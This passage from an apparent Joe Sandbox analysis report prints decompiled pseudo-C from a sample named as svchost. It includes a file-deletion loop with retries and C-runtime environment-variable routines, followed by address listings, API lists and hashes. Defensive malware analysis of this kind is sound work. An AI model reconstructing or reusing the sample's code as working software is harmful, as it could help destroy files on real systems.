                            										} while (_t87 != 0);
                            										_t116 = _t122 >> 2;
                            										memcpy(_t135, _t145, _t116 << 2);
                            										_t90 = memcpy(_t145 + _t116 + _t116, _t145, _t122 & 0x00000003);
                            										_t156 = _t154 + 0x18;
                            										if((_v0 & 0x00000010) == 0) {
                            											_t91 = E00BCEF70(_t90); // executed
                            											_t154 = _t156 + 4;
                            											if(_t91 != 0) {
                            												Sleep(0x64);
                            												E00BCEF70( &_a1120);
                            												_t154 = _t154 + 4;
                            											}
                            										} else {
                            											E00BC4C90( &_a9320, _t90, 0x1000);
                            											_push( &_a9320); // executed
                            											E00BC40E0(_t122); // executed
                            											_t154 = _t156 + 0x10;
                            										}
                            										goto L38;
                            									}
                            									_t122 =  *((intOrPtr*)(_t114 + 2));
                            									_t36 = _t83 + 2; // 0x2e
                            									if(_t122 !=  *_t36) {
                            										break;
                            									}
                            									_t114 = _t114 + 4;
                            									_t83 = _t83 + 4;
                            									if(_t122 != 0) {
                            										continue;
                            									}
                            									goto L27;
                            								}
                            								asm("sbb eax, eax");
                            								_t84 = _t83 | 0x00000001;
                            								goto L29;
                            							}
                            							_t122 =  *((intOrPtr*)(_t79 + 2));
                            							_t33 =  &(_t113[2]); // 0x2e0000
                            							if(_t122 !=  *_t33) {
                            								break;
                            							}
                            							_t79 = _t79 + 4;
                            							_t113 =  &(_t113[4]);
                            							if(_t122 != 0) {
                            								continue;
                            							}
                            							goto L19;
                            						}
                            						asm("sbb eax, eax");
                            						_t80 = _t79 | 0x00000001;
                            						goto L21;
                            						L38:
                            						_push( &_v0);
                            						_t82 = E00BCE557(_t103, _t122, _t145, _v4); // executed
                            						_t153 = _t154 + 8;
                            					} while (_t82 == 0);
                            					goto L39;
                            				} else {
                            					_t141 =  &_a1120 + 0xfffffffe;
                            					do {
                            						_t98 =  *((intOrPtr*)(_t141 + 2));
                            						_t141 = _t141 + 2;
                            					} while (_t98 != 0);
                            					_t99 = "\\"; // 0x5c
                            					_t103 = _t103 + 1;
                            					 *_t141 = _t99;
                            					goto L9;
                            				}
                            				L1:
                            				_t62 =  *(_t148 + _t105 + 0x3480) & 0x0000ffff;
                            				_t105 = _t105 + 2;
                            				 *(_t148 + _t105 + 0x46e) = _t62;
                            				if(_t62 != 0) {
                            					goto L1;
                            				} else {
                            					_t101 =  &_a1120;
                            					_t106 = _t101 + 2;
                            					goto L3;
                            				}
                            			}



















































                            0x00bc433f
                            0x00bc433f
                            0x00bc42f8
                            0x00bc4306
                            0x00bc4312
                            0x00bc4313
                            0x00bc4318
                            0x00bc4318
                            0x00000000
                            0x00bc42f6
                            0x00bc427d
                            0x00bc4281
                            0x00bc4285
                            0x00000000
                            0x00000000
                            0x00bc4287
                            0x00bc428a
                            0x00bc4290
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00bc4290
                            0x00bc4296
                            0x00bc4298
                            0x00000000
                            0x00bc4298
                            0x00bc423d
                            0x00bc4241
                            0x00bc4245
                            0x00000000
                            0x00000000
                            0x00bc4247
                            0x00bc424a
                            0x00bc4250
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00bc4250
                            0x00bc4256
                            0x00bc4258
                            0x00000000
                            0x00bc4342
                            0x00bc4346
                            0x00bc434b
                            0x00bc4350
                            0x00bc4353
                            0x00000000
                            0x00bc4163
                            0x00bc416a
                            0x00bc4170
                            0x00bc4170
                            0x00bc4174
                            0x00bc4177
                            0x00bc417c
                            0x00bc4181
                            0x00bc4182
                            0x00000000
                            0x00bc4182
                            0x00bc4120
                            0x00bc4120
                            0x00bc4128
                            0x00bc412b
                            0x00bc4136
                            0x00000000
                            0x00bc4138
                            0x00bc4138
                            0x00bc413f
                            0x00000000
                            0x00bc413f

                            APIs
                              • Part of subcall function 00BC4BF0: MultiByteToWideChar.KERNEL32(0000FDE9,?,?,000000FF,?,?,?,?,00BC4117,?,?,00001000), ref: 00BC4C08
                              • Part of subcall function 00BCEF70: DeleteFileW.KERNELBASE(?,?,00BC46DC,?,?,?), ref: 00BCEF78
                              • Part of subcall function 00BCEF70: GetLastError.KERNEL32(?,?), ref: 00BCEF82
                              • Part of subcall function 00BCEF70: __dosmaperr.LIBCMT ref: 00BCEF89
                            • Sleep.KERNEL32(00000064), ref: 00BC432C
                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: ByteCharDeleteErrorFileLastMultiSleepWide__dosmaperr
                            • String ID:
                            • API String ID: 762390858-0
                            • Opcode ID: d87a8b59973b7f55744b8c86660648f942d37a9b8b7e5f8b0c0d5ef100e9dc50
                            • Instruction ID: 8da24446f374171c91feae6739bae7b9738cc6a15184f892f737a31a444e4053
                            • Opcode Fuzzy Hash: d87a8b59973b7f55744b8c86660648f942d37a9b8b7e5f8b0c0d5ef100e9dc50
                            • Instruction Fuzzy Hash: 2F6127754043428BC720EB64D852FEBB3E9FFA1348F4409ACE9999B190FB31EA45C756
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Non-executed Functions

                            C-Code - Quality: 84%
                            			E00BD61F0(void* __edx, signed int _a4, signed int _a8) {
                            				signed int _v0;
                            				signed char _v5;
                            				intOrPtr _v8;
                            				signed char _v9;
                            				signed int _v12;
                            				signed int _v16;
                            				signed int _v20;
                            				intOrPtr _v24;
                            				signed int _v44;
                            				signed int _v92;
                            				signed int _v128;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				void* __ebp;
                            				signed int _t116;
                            				signed int _t119;
                            				signed int _t120;
                            				signed int _t122;
                            				signed int _t123;
                            				signed int _t126;
                            				signed int _t127;
                            				signed int _t131;
                            				signed int _t133;
                            				signed int _t136;
                            				signed int _t138;
                            				signed int _t139;
                            				signed int _t142;
                            				void* _t143;
                            				signed int _t148;
                            				signed int* _t150;
                            				signed int* _t156;
                            				signed int _t163;
                            				signed int _t165;
                            				signed int _t167;
                            				intOrPtr _t168;
                            				signed int _t173;
                            				signed int _t175;
                            				signed int _t176;
                            				signed int _t180;
                            				signed int _t185;
                            				intOrPtr* _t186;
                            				signed int _t191;
                            				signed int _t196;
                            				signed int _t197;
                            				signed int _t204;
                            				intOrPtr* _t205;
                            				signed int _t214;
                            				signed int _t215;
                            				signed int _t217;
                            				signed int _t218;
                            				signed int _t220;
                            				signed int _t221;
                            				signed int _t223;
                            				intOrPtr _t225;
                            				void* _t231;
                            				signed int _t233;
                            				void* _t236;
                            				signed int _t237;
                            				signed int _t238;
                            				void* _t241;
                            				signed int _t244;
                            				signed int _t246;
                            				void* _t252;
                            				signed int _t253;
                            				signed int _t254;
                            				void* _t260;
                            				void* _t262;
                            				signed int _t263;
                            				intOrPtr* _t267;
                            				intOrPtr* _t271;
                            				signed int _t274;
                            				signed int _t276;
                            				signed int _t280;
                            				signed int _t282;
                            				void* _t283;
                            				void* _t284;
                            				void* _t285;
                            				void* _t286;
                            				signed int _t287;
                            				signed int _t289;
                            				signed int _t291;
                            				signed int _t292;
                            				signed int* _t293;
                            				signed int _t299;
                            				signed int _t300;
                            				CHAR* _t301;
                            				signed int _t303;
                            				signed int _t304;
                            				WCHAR* _t305;
                            				signed int _t306;
                            				signed int _t307;
                            				signed int* _t308;
                            				signed int _t309;
                            				signed int _t311;
                            				void* _t317;
                            				void* _t318;
                            				void* _t319;
                            				void* _t321;
                            				void* _t322;
                            				void* _t323;
                            				void* _t324;
                            
                            				_t283 = __edx;
                            				_t217 = _a4;
                            				if(_t217 != 0) {
                            					_t287 = _t217;
                            					_t116 = E00BC8680(_t217, 0x3d);
                            					_v16 = _t116;
                            					_t231 = _t286;
                            					__eflags = _t116;
                            					if(_t116 == 0) {
                            						L10:
                            						 *((intOrPtr*)(E00BCC9CE())) = 0x16;
                            						goto L11;
                            					} else {
                            						__eflags = _t116 - _t217;
                            						if(_t116 == _t217) {
                            							goto L10;
                            						} else {
                            							__eflags =  *((char*)(_t116 + 1));
                            							_t299 =  *0xbf60bc; // 0xe016f8
                            							_t120 = _t116 & 0xffffff00 |  *((char*)(_t116 + 1)) == 0x00000000;
                            							_v5 = _t120;
                            							__eflags = _t299 -  *0xbf60c8; // 0xe19f50
                            							if(__eflags == 0) {
                            								L87();
                            								_t299 = _t120;
                            								_t120 = _v5;
                            								_t231 = _t299;
                            								 *0xbf60bc = _t299;
                            							}
                            							_t218 = 0;
                            							__eflags = _t299;
                            							if(_t299 != 0) {
                            								L21:
                            								_t233 = _t287;
                            								_t122 = _v16 - _t233;
                            								_push(_t122);
                            								_push(_t233);
                            								L121();
                            								_v12 = _t122;
                            								__eflags = _t122;
                            								if(_t122 < 0) {
                            									L29:
                            									__eflags = _v5 - _t218;
                            									if(_v5 != _t218) {
                            										goto L12;
                            									} else {
                            										_t123 =  ~_t122;
                            										_v12 = _t123;
                            										_t27 = _t123 + 2; // 0x2
                            										_t236 = _t27;
                            										__eflags = _t236 - _t123;
                            										if(_t236 < _t123) {
                            											goto L11;
                            										} else {
                            											__eflags = _t236 - 0x3fffffff;
                            											if(_t236 >= 0x3fffffff) {
                            												goto L11;
                            											} else {
                            												_push(4);
                            												_push(_t236);
                            												_t300 = E00BD850F(_t299);
                            												E00BD09EB(_t218);
                            												_t321 = _t321 + 0x10;
                            												__eflags = _t300;
                            												if(_t300 == 0) {
                            													goto L11;
                            												} else {
                            													_t237 = _v12;
                            													_t287 = _t218;
                            													_t126 = _a4;
                            													 *(_t300 + _t237 * 4) = _t126;
                            													 *(_t300 + 4 + _t237 * 4) = _t218;
                            													goto L34;
                            												}
                            											}
                            										}
                            									}
                            								} else {
                            									__eflags =  *_t299 - _t218;
                            									if( *_t299 == _t218) {
                            										goto L29;
                            									} else {
                            										E00BD09EB( *((intOrPtr*)(_t299 + _t122 * 4)));
                            										_t282 = _v12;
                            										__eflags = _v5 - _t218;
                            										if(_v5 != _t218) {
                            											while(1) {
                            												__eflags =  *(_t299 + _t282 * 4) - _t218;
                            												if( *(_t299 + _t282 * 4) == _t218) {
                            													break;
                            												}
                            												 *(_t299 + _t282 * 4) =  *(_t299 + 4 + _t282 * 4);
                            												_t282 = _t282 + 1;
                            												__eflags = _t282;
                            											}
                            											_push(4);
                            											_push(_t282);
                            											_t300 = E00BD850F(_t299);
                            											E00BD09EB(_t218);
                            											_t321 = _t321 + 0x10;
                            											_t126 = _t287;
                            											__eflags = _t300;
                            											if(_t300 != 0) {
                            												L34:
                            												 *0xbf60bc = _t300;
                            											}
                            										} else {
                            											_t126 = _a4;
                            											_t287 = _t218;
                            											 *(_t299 + _t282 * 4) = _t126;
                            										}
                            										__eflags = _a8 - _t218;
                            										if(_a8 == _t218) {
                            											goto L12;
                            										} else {
                            											_t238 = _t126;
                            											_t284 = _t238 + 1;
                            											do {
                            												_t127 =  *_t238;
                            												_t238 = _t238 + 1;
                            												__eflags = _t127;
                            											} while (_t127 != 0);
                            											_v12 = _t238 - _t284 + 2;
                            											_t301 = E00BD0B10(_t238 - _t284, _t238 - _t284 + 2, 1);
                            											_pop(_t241);
                            											__eflags = _t301;
                            											if(_t301 == 0) {
                            												L42:
                            												E00BD09EB(_t301);
                            												goto L12;
                            											} else {
                            												_t131 = E00BD0A73(_t301, _v12, _a4);
                            												_t322 = _t321 + 0xc;
                            												__eflags = _t131;
                            												if(_t131 != 0) {
                            													_push(_t218);
                            													_push(_t218);
                            													_push(_t218);
                            													_push(_t218);
                            													_push(_t218);
                            													E00BD1798();
                            													asm("int3");
                            													_t317 = _t322;
                            													_t323 = _t322 - 0xc;
                            													_push(_t218);
                            													_t220 = _v44;
                            													__eflags = _t220;
                            													if(_t220 != 0) {
                            														_push(_t301);
                            														_push(_t287);
                            														_push(0x3d);
                            														_t289 = _t220;
                            														_t133 = E00BC88E7(_t241);
                            														_v20 = _t133;
                            														_t244 = _t220;
                            														__eflags = _t133;
                            														if(_t133 == 0) {
                            															L54:
                            															 *((intOrPtr*)(E00BCC9CE())) = 0x16;
                            															goto L55;
                            														} else {
                            															__eflags = _t133 - _t220;
                            															if(_t133 == _t220) {
                            																goto L54;
                            															} else {
                            																_t303 =  *0xbf60c0; // 0xe19000
                            																_t221 = 0;
                            																__eflags =  *(_t133 + 2);
                            																_t246 = _t244 & 0xffffff00 |  *(_t133 + 2) == 0x00000000;
                            																_v9 = _t246;
                            																__eflags = _t303 -  *0xbf60c4; // 0xe04c88
                            																if(__eflags == 0) {
                            																	_push(_t303);
                            																	L104();
                            																	_t246 = _v9;
                            																	_t303 = _t133;
                            																	 *0xbf60c0 = _t303;
                            																}
                            																__eflags = _t303;
                            																if(_t303 != 0) {
                            																	L64:
                            																	_v20 = _v20 - _t289 >> 1;
                            																	_t138 = E00BD682B(_t289, _v20 - _t289 >> 1);
                            																	_v16 = _t138;
                            																	__eflags = _t138;
                            																	if(_t138 < 0) {
                            																		L72:
                            																		__eflags = _v9 - _t221;
                            																		if(_v9 != _t221) {
                            																			goto L56;
                            																		} else {
                            																			_t139 =  ~_t138;
                            																			_v16 = _t139;
                            																			_t72 = _t139 + 2; // 0x2
                            																			_t252 = _t72;
                            																			__eflags = _t252 - _t139;
                            																			if(_t252 < _t139) {
                            																				goto L55;
                            																			} else {
                            																				__eflags = _t252 - 0x3fffffff;
                            																				if(_t252 >= 0x3fffffff) {
                            																					goto L55;
                            																				} else {
                            																					_push(4);
                            																					_push(_t252);
                            																					_t304 = E00BD850F(_t303);
                            																					E00BD09EB(_t221);
                            																					_t323 = _t323 + 0x10;
                            																					__eflags = _t304;
                            																					if(_t304 == 0) {
                            																						goto L55;
                            																					} else {
                            																						_t253 = _v16;
                            																						_t289 = _t221;
                            																						_t142 = _v0;
                            																						 *(_t304 + _t253 * 4) = _t142;
                            																						 *(_t304 + 4 + _t253 * 4) = _t221;
                            																						goto L77;
                            																					}
                            																				}
                            																			}
                            																		}
                            																	} else {
                            																		__eflags =  *_t303 - _t221;
                            																		if( *_t303 == _t221) {
                            																			goto L72;
                            																		} else {
                            																			E00BD09EB( *((intOrPtr*)(_t303 + _t138 * 4)));
                            																			_t276 = _v16;
                            																			__eflags = _v9 - _t221;
                            																			if(_v9 != _t221) {
                            																				while(1) {
                            																					__eflags =  *(_t303 + _t276 * 4) - _t221;
                            																					if( *(_t303 + _t276 * 4) == _t221) {
                            																						break;
                            																					}
                            																					 *(_t303 + _t276 * 4) =  *(_t303 + 4 + _t276 * 4);
                            																					_t276 = _t276 + 1;
                            																					__eflags = _t276;
                            																				}
                            																				_push(4);
                            																				_push(_t276);
                            																				_t304 = E00BD850F(_t303);
                            																				E00BD09EB(_t221);
                            																				_t323 = _t323 + 0x10;
                            																				_t142 = _t289;
                            																				__eflags = _t304;
                            																				if(_t304 != 0) {
                            																					L77:
                            																					 *0xbf60c0 = _t304;
                            																				}
                            																			} else {
                            																				_t142 = _v0;
                            																				_t289 = _t221;
                            																				 *(_t303 + _t276 * 4) = _t142;
                            																			}
                            																			__eflags = _a4 - _t221;
                            																			if(_a4 == _t221) {
                            																				goto L56;
                            																			} else {
                            																				_t254 = _t142;
                            																				_t81 = _t254 + 2; // 0x2
                            																				_t285 = _t81;
                            																				do {
                            																					_t143 =  *_t254;
                            																					_t254 = _t254 + 2;
                            																					__eflags = _t143 - _t221;
                            																				} while (_t143 != _t221);
                            																				_t82 = (_t254 - _t285 >> 1) + 2; // 0x0
                            																				_v16 = _t82;
                            																				_t305 = E00BD0B10(_t254 - _t285 >> 1, _t82, 2);
                            																				_pop(_t258);
                            																				__eflags = _t305;
                            																				if(_t305 == 0) {
                            																					L85:
                            																					E00BD09EB(_t305);
                            																					goto L56;
                            																				} else {
                            																					_t148 = E00BD618C(_t305, _v16, _v0);
                            																					_t324 = _t323 + 0xc;
                            																					__eflags = _t148;
                            																					if(_t148 != 0) {
                            																						_push(_t221);
                            																						_push(_t221);
                            																						_push(_t221);
                            																						_push(_t221);
                            																						_push(_t221);
                            																						E00BD1798();
                            																						asm("int3");
                            																						_push(_t317);
                            																						_t318 = _t324;
                            																						_push(_t289);
                            																						_t291 = _v92;
                            																						__eflags = _t291;
                            																						if(_t291 != 0) {
                            																							_t260 = 0;
                            																							_t150 = _t291;
                            																							__eflags =  *_t291;
                            																							if( *_t291 != 0) {
                            																								do {
                            																									_t150 =  &(_t150[1]);
                            																									_t260 = _t260 + 1;
                            																									__eflags =  *_t150;
                            																								} while ( *_t150 != 0);
                            																							}
                            																							_t93 = _t260 + 1; // 0x2
                            																							_t306 = E00BD0B10(_t260, _t93, 4);
                            																							_t262 = _t305;
                            																							__eflags = _t306;
                            																							if(_t306 == 0) {
                            																								L102:
                            																								E00BD0ACD(_t221, _t285, _t291, _t306);
                            																								goto L103;
                            																							} else {
                            																								__eflags =  *_t291;
                            																								if( *_t291 == 0) {
                            																									L100:
                            																									E00BD09EB(0);
                            																									_t175 = _t306;
                            																									goto L101;
                            																								} else {
                            																									_push(_t221);
                            																									_t221 = _t306 - _t291;
                            																									__eflags = _t221;
                            																									do {
                            																										_t271 =  *_t291;
                            																										_t94 = _t271 + 1; // 0x5
                            																										_t285 = _t94;
                            																										do {
                            																											_t176 =  *_t271;
                            																											_t271 = _t271 + 1;
                            																											__eflags = _t176;
                            																										} while (_t176 != 0);
                            																										_t262 = _t271 - _t285;
                            																										_t95 = _t262 + 1; // 0x6
                            																										_v16 = _t95;
                            																										 *(_t221 + _t291) = E00BD0B10(_t262, _t95, 1);
                            																										E00BD09EB(0);
                            																										_t324 = _t324 + 0xc;
                            																										__eflags =  *(_t221 + _t291);
                            																										if( *(_t221 + _t291) == 0) {
                            																											goto L102;
                            																										} else {
                            																											_t180 = E00BD0A73( *(_t221 + _t291), _v16,  *_t291);
                            																											_t324 = _t324 + 0xc;
                            																											__eflags = _t180;
                            																											if(_t180 != 0) {
                            																												L103:
                            																												_push(0);
                            																												_push(0);
                            																												_push(0);
                            																												_push(0);
                            																												_push(0);
                            																												E00BD1798();
                            																												asm("int3");
                            																												_push(_t318);
                            																												_t319 = _t324;
                            																												_push(_t262);
                            																												_push(_t262);
                            																												_push(_t291);
                            																												_t292 = _v128;
                            																												__eflags = _t292;
                            																												if(_t292 != 0) {
                            																													_push(_t221);
                            																													_t223 = 0;
                            																													_t156 = _t292;
                            																													_t263 = 0;
                            																													_v20 = 0;
                            																													_push(_t306);
                            																													__eflags =  *_t292;
                            																													if( *_t292 != 0) {
                            																														do {
                            																															_t156 =  &(_t156[1]);
                            																															_t263 = _t263 + 1;
                            																															__eflags =  *_t156;
                            																														} while ( *_t156 != 0);
                            																													}
                            																													_t104 = _t263 + 1; // 0x2
                            																													_t307 = E00BD0B10(_t263, _t104, 4);
                            																													__eflags = _t307;
                            																													if(_t307 == 0) {
                            																														L119:
                            																														E00BD0ACD(_t223, _t285, _t292, _t307);
                            																														goto L120;
                            																													} else {
                            																														__eflags =  *_t292 - _t223;
                            																														if( *_t292 == _t223) {
                            																															L117:
                            																															E00BD09EB(_t223);
                            																															_t167 = _t307;
                            																															goto L118;
                            																														} else {
                            																															_t223 = _t307 - _t292;
                            																															__eflags = _t223;
                            																															do {
                            																																_t267 =  *_t292;
                            																																_t105 = _t267 + 2; // 0x6
                            																																_t285 = _t105;
                            																																do {
                            																																	_t168 =  *_t267;
                            																																	_t267 = _t267 + 2;
                            																																	__eflags = _t168 - _v20;
                            																																} while (_t168 != _v20);
                            																																_t107 = (_t267 - _t285 >> 1) + 1; // 0x3
                            																																_v24 = _t107;
                            																																 *(_t223 + _t292) = E00BD0B10(_t267 - _t285 >> 1, _t107, 2);
                            																																E00BD09EB(0);
                            																																_t324 = _t324 + 0xc;
                            																																__eflags =  *(_t223 + _t292);
                            																																if( *(_t223 + _t292) == 0) {
                            																																	goto L119;
                            																																} else {
                            																																	_t173 = E00BD618C( *(_t223 + _t292), _v24,  *_t292);
                            																																	_t324 = _t324 + 0xc;
                            																																	__eflags = _t173;
                            																																	if(_t173 != 0) {
                            																																		L120:
                            																																		_push(0);
                            																																		_push(0);
                            																																		_push(0);
                            																																		_push(0);
                            																																		_push(0);
                            																																		E00BD1798();
                            																																		asm("int3");
                            																																		_push(_t319);
                            																																		_push(_t223);
                            																																		_push(_t307);
                            																																		_push(_t292);
                            																																		_t293 =  *0xbf60bc; // 0xe016f8
                            																																		_t308 = _t293;
                            																																		__eflags =  *_t293;
                            																																		if( *_t293 == 0) {
                            																																			L127:
                            																																			_t309 = _t308 - _t293;
                            																																			__eflags = _t309;
                            																																			_t311 =  ~(_t309 >> 2);
                            																																		} else {
                            																																			_t225 = _v8;
                            																																			do {
                            																																				_t163 = E00BDC265(_v12,  *_t308, _t225);
                            																																				_t324 = _t324 + 0xc;
                            																																				__eflags = _t163;
                            																																				if(_t163 != 0) {
                            																																					goto L126;
                            																																				} else {
                            																																					_t165 =  *((intOrPtr*)(_t225 +  *_t308));
                            																																					__eflags = _t165 - 0x3d;
                            																																					if(_t165 == 0x3d) {
                            																																						L129:
                            																																						_t311 = _t308 - _t293 >> 2;
                            																																					} else {
                            																																						__eflags = _t165;
                            																																						if(_t165 == 0) {
                            																																							goto L129;
                            																																						} else {
                            																																							goto L126;
                            																																						}
                            																																					}
                            																																				}
                            																																				goto L128;
                            																																				L126:
                            																																				_t308 =  &(_t308[1]);
                            																																				__eflags =  *_t308;
                            																																			} while ( *_t308 != 0);
                            																																			goto L127;
                            																																		}
                            																																		L128:
                            																																		return _t311;
                            																																	} else {
                            																																		goto L115;
                            																																	}
                            																																}
                            																																goto L130;
                            																																L115:
                            																																_t292 = _t292 + 4;
                            																																__eflags =  *_t292 - _t173;
                            																															} while ( *_t292 != _t173);
                            																															_t223 = 0;
                            																															__eflags = 0;
                            																															goto L117;
                            																														}
                            																													}
                            																												} else {
                            																													_t167 = 0;
                            																													L118:
                            																													return _t167;
                            																												}
                            																											} else {
                            																												goto L98;
                            																											}
                            																										}
                            																										goto L130;
                            																										L98:
                            																										_t291 = _t291 + 4;
                            																										__eflags =  *_t291 - _t180;
                            																									} while ( *_t291 != _t180);
                            																									goto L100;
                            																								}
                            																							}
                            																						} else {
                            																							_t175 = 0;
                            																							L101:
                            																							return _t175;
                            																						}
                            																					} else {
                            																						_t274 =  &(_t305[_v20 + 1]);
                            																						 *(_t274 - 2) = _t148;
                            																						asm("sbb eax, eax");
                            																						_t185 = SetEnvironmentVariableW(_t305,  !( ~(_v9 & 0x000000ff)) & _t274);
                            																						__eflags = _t185;
                            																						if(_t185 == 0) {
                            																							_t186 = E00BCC9CE();
                            																							_t221 = _t221 | 0xffffffff;
                            																							__eflags = _t221;
                            																							 *_t186 = 0x2a;
                            																						}
                            																						goto L85;
                            																					}
                            																				}
                            																			}
                            																		}
                            																	}
                            																} else {
                            																	_t191 =  *0xbf60bc; // 0xe016f8
                            																	__eflags = _a4 - _t221;
                            																	if(_a4 == _t221) {
                            																		L58:
                            																		__eflags = _t246;
                            																		if(_t246 != 0) {
                            																			goto L56;
                            																		} else {
                            																			__eflags = _t191;
                            																			if(_t191 != 0) {
                            																				L62:
                            																				 *0xbf60c0 = E00BD0B10(_t246, 1, 4);
                            																				E00BD09EB(_t221);
                            																				_t323 = _t323 + 0xc;
                            																				goto L63;
                            																			} else {
                            																				 *0xbf60bc = E00BD0B10(_t246, 1, 4);
                            																				E00BD09EB(_t221);
                            																				_t323 = _t323 + 0xc;
                            																				__eflags =  *0xbf60bc - _t221; // 0xe016f8
                            																				if(__eflags == 0) {
                            																					goto L55;
                            																				} else {
                            																					_t303 =  *0xbf60c0; // 0xe19000
                            																					__eflags = _t303;
                            																					if(_t303 != 0) {
                            																						goto L64;
                            																					} else {
                            																						goto L62;
                            																					}
                            																				}
                            																			}
                            																		}
                            																	} else {
                            																		__eflags = _t191;
                            																		if(_t191 == 0) {
                            																			goto L58;
                            																		} else {
                            																			_t196 = L00BCFF04(_t221);
                            																			__eflags = _t196;
                            																			if(_t196 != 0) {
                            																				L63:
                            																				_t303 =  *0xbf60c0; // 0xe19000
                            																				__eflags = _t303;
                            																				if(_t303 == 0) {
                            																					L55:
                            																					_t221 = _t220 | 0xffffffff;
                            																					__eflags = _t221;
                            																					L56:
                            																					E00BD09EB(_t289);
                            																					_t136 = _t221;
                            																					goto L57;
                            																				} else {
                            																					goto L64;
                            																				}
                            																			} else {
                            																				goto L54;
                            																			}
                            																		}
                            																	}
                            																}
                            															}
                            														}
                            													} else {
                            														_t197 = E00BCC9CE();
                            														 *_t197 = 0x16;
                            														_t136 = _t197 | 0xffffffff;
                            														L57:
                            														return _t136;
                            													}
                            												} else {
                            													_t280 = _v16 + 1 + _t301 - _a4;
                            													asm("sbb eax, eax");
                            													 *(_t280 - 1) = _t218;
                            													_t204 = SetEnvironmentVariableA(_t301,  !( ~(_v5 & 0x000000ff)) & _t280);
                            													__eflags = _t204;
                            													if(_t204 == 0) {
                            														_t205 = E00BCC9CE();
                            														_t218 = _t218 | 0xffffffff;
                            														__eflags = _t218;
                            														 *_t205 = 0x2a;
                            													}
                            													goto L42;
                            												}
                            											}
                            										}
                            									}
                            								}
                            							} else {
                            								__eflags = _a8;
                            								if(_a8 == 0) {
                            									L14:
                            									__eflags = _t120;
                            									if(_t120 == 0) {
                            										 *0xbf60bc = E00BD0B10(_t231, 1, 4);
                            										E00BD09EB(_t218);
                            										_t299 =  *0xbf60bc; // 0xe016f8
                            										_t321 = _t321 + 0xc;
                            										__eflags = _t299;
                            										if(_t299 == 0) {
                            											goto L11;
                            										} else {
                            											__eflags =  *0xbf60c0 - _t218; // 0xe19000
                            											if(__eflags != 0) {
                            												goto L20;
                            											} else {
                            												 *0xbf60c0 = E00BD0B10(_t231, 1, 4);
                            												E00BD09EB(_t218);
                            												_t321 = _t321 + 0xc;
                            												__eflags =  *0xbf60c0 - _t218; // 0xe19000
                            												if(__eflags == 0) {
                            													goto L11;
                            												} else {
                            													goto L19;
                            												}
                            											}
                            										}
                            									} else {
                            										_t218 = 0;
                            										goto L12;
                            									}
                            								} else {
                            									__eflags =  *0xbf60c0 - _t218; // 0xe19000
                            									if(__eflags == 0) {
                            										goto L14;
                            									} else {
                            										_t214 = L00BCFEFF(0, _t283);
                            										__eflags = _t214;
                            										if(_t214 != 0) {
                            											L19:
                            											_t299 =  *0xbf60bc; // 0xe016f8
                            											L20:
                            											__eflags = _t299;
                            											if(_t299 == 0) {
                            												L11:
                            												_t218 = _t217 | 0xffffffff;
                            												__eflags = _t218;
                            												L12:
                            												E00BD09EB(_t287);
                            												_t119 = _t218;
                            												goto L13;
                            											} else {
                            												goto L21;
                            											}
                            										} else {
                            											goto L10;
                            										}
                            									}
                            								}
                            							}
                            						}
                            					}
                            				} else {
                            					_t215 = E00BCC9CE();
                            					 *_t215 = 0x16;
                            					_t119 = _t215 | 0xffffffff;
                            					L13:
                            					return _t119;
                            				}
                            				L130:
                            			}
                            0x00bd65fc
                            0x00bd6604
                            0x00bd6607
                            0x00bd6608
                            0x00bd660a
                            0x00bd6651
                            0x00bd6652
                            0x00000000
                            0x00bd660c
                            0x00bd6614
                            0x00bd6619
                            0x00bd661c
                            0x00bd661e
                            0x00bd665d
                            0x00bd665e
                            0x00bd665f
                            0x00bd6660
                            0x00bd6661
                            0x00bd6662
                            0x00bd6667
                            0x00bd666a
                            0x00bd666b
                            0x00bd666e
                            0x00bd666f
                            0x00bd6672
                            0x00bd6674
                            0x00bd667d
                            0x00bd667f
                            0x00bd6681
                            0x00bd6683
                            0x00bd6685
                            0x00bd6685
                            0x00bd6688
                            0x00bd6689
                            0x00bd6689
                            0x00bd6685
                            0x00bd668f
                            0x00bd669a
                            0x00bd669d
                            0x00bd669e
                            0x00bd66a0
                            0x00bd6707
                            0x00bd6707
                            0x00000000
                            0x00bd66a2
                            0x00bd66a2
                            0x00bd66a5
                            0x00bd66f7
                            0x00bd66f9
                            0x00bd66ff
                            0x00000000
                            0x00bd66a7
                            0x00bd66a7
                            0x00bd66aa
                            0x00bd66aa
                            0x00bd66ac
                            0x00bd66ac
                            0x00bd66ae
                            0x00bd66ae
                            0x00bd66b1
                            0x00bd66b1
                            0x00bd66b3
                            0x00bd66b4
                            0x00bd66b4
                            0x00bd66b8
                            0x00bd66bc
                            0x00bd66c0
                            0x00bd66ca
                            0x00bd66cd
                            0x00bd66d2
                            0x00bd66d5
                            0x00bd66d9
                            0x00000000
                            0x00bd66db
                            0x00bd66e3
                            0x00bd66e8
                            0x00bd66eb
                            0x00bd66ed
                            0x00bd670c
                            0x00bd670e
                            0x00bd670f
                            0x00bd6710
                            0x00bd6711
                            0x00bd6712
                            0x00bd6713
                            0x00bd6718
                            0x00bd671b
                            0x00bd671c
                            0x00bd671e
                            0x00bd671f
                            0x00bd6720
                            0x00bd6721
                            0x00bd6724
                            0x00bd6726
                            0x00bd672f
                            0x00bd6730
                            0x00bd6732
                            0x00bd6734
                            0x00bd6736
                            0x00bd6739
                            0x00bd673a
                            0x00bd673c
                            0x00bd673e
                            0x00bd673e
                            0x00bd6741
                            0x00bd6742
                            0x00bd6742
                            0x00bd673e
                            0x00bd6746
                            0x00bd6751
                            0x00bd6755
                            0x00bd6757
                            0x00bd67c5
                            0x00bd67c5
                            0x00000000
                            0x00bd6759
                            0x00bd6759
                            0x00bd675b
                            0x00bd67b5
                            0x00bd67b6
